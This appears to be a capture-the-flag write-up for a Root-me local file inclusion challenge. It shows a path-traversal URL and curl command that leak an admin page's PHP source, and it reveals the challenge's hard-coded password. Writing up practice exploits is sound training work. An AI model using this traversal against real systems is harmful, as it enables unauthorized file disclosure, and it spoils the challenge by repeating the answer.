Rootme LFI Abbreviated
Root-me
Local File Inclusion
Abbreviated LFI
Our goal is to get to the admin section.
When we get to the challenge page, we’re greeted by a “File viewer”. There’s a few categories with files inside. If we browse to one and look at the url we can start playing around with the url.
http://challenge01.root-me.org/web-serveur/ch16/?files=sysadm
We need to get to the admin section, we know that the url for the admin section is http://challenge01.root-me.org/web-serveur/ch16/admin/
So we could try backup a folder.
http://challenge01.root-me.org/web-serveur/ch16/?files=../admin
There’s a file inside, an index.php
curl http://challenge01.root-me.org/web-serveur/ch16/?files=../admin&f=index.php
<h1>File viewer v 0.01</h1><span id="mnenu"/> | <span>
<a href="?files=sysadm">sysadm</a></span> | <span>
<a href="?files=reseau">reseau</a></span> | <span>
<a href="?files=esprit">esprit</a></span> | <span>
<a href="?files=crypto">crypto</a></span> | <span>
<a href="?files=coding">coding</a></span> | <span>
<a href="?files=archives">archives</a></span> |
<span style='text-align: right; float:right;'>Connected as : <b>guest</b> |
<a href="admin/">admin</a></span><br/><hr/><table id="content"><tr><td style="vertical-align: top;">
<a href="?files=../admin&f=index.php" ><img width="32px" height="32px" src="text.gif" alt="index.php">index.php</a><br/></td>
<td style="vertical-align: top;"></td></tr></table></body></html>
<pre><?php
function http_digest_parse($txt)
{
$needed_parts = array('nonce'=>1, 'nc'=>1, 'cnonce'=>1, 'qop'=>1, 'username'=>1, 'uri'=>1, 'response'=>1);
$data = array();
$keys = implode('|', array_keys($needed_parts));
preg_match_all('@(' . $keys . ')=(?:([\'"])([^\2]+?)\2|([^\s,]+))@', $txt, $matches, PREG_SET_ORDER);
foreach ($matches as $m) {
$data[$m[1]] = $m[3] ? $m[3] : $m[4];
unset($needed_parts[$m[1]]);
}
return $needed_parts ? false : $data;
}
function auth($realm){
header('HTTP/1.1 401 Unauthorized');
header('WWW-Authenticate: Digest realm="'.$realm.'",qop="auth",nonce="'.uniqid().'",opaque="'.md5($realm).'"');
die($realm);
}
$realm = 'PHP Restricted area';
$users = array('admin' => 'OpbNJ60xYpvAQU8');
if (empty($_SERVER['PHP_AUTH_DIGEST'])) {
auth($realm);
}
if (!($data = http_digest_parse($_SERVER['PHP_AUTH_DIGEST'])) || !isset($users[$data['username']]))
auth($realm);
$A1 = md5($data['username'] . ':' . $realm . ':' . $users[$data['username']]);
$A2 = md5($_SERVER['REQUEST_METHOD'].':'.$data['uri']);
$valid_response = md5($A1.':'.$data['nonce'].':'.$data['nc'].':'.$data['cnonce'].':'.$data['qop'].':'.$A2);
if ($data['response'] != $valid_response)
auth($realm);
echo "<html>
<head></head>
<body>
<h3>You could use this password to validate the challenge !</h3>
</body>
</html>";
?></pre><hr/></td></tr></table></body></html>
We got the password in the file: OpbNJ60xYpvAQU8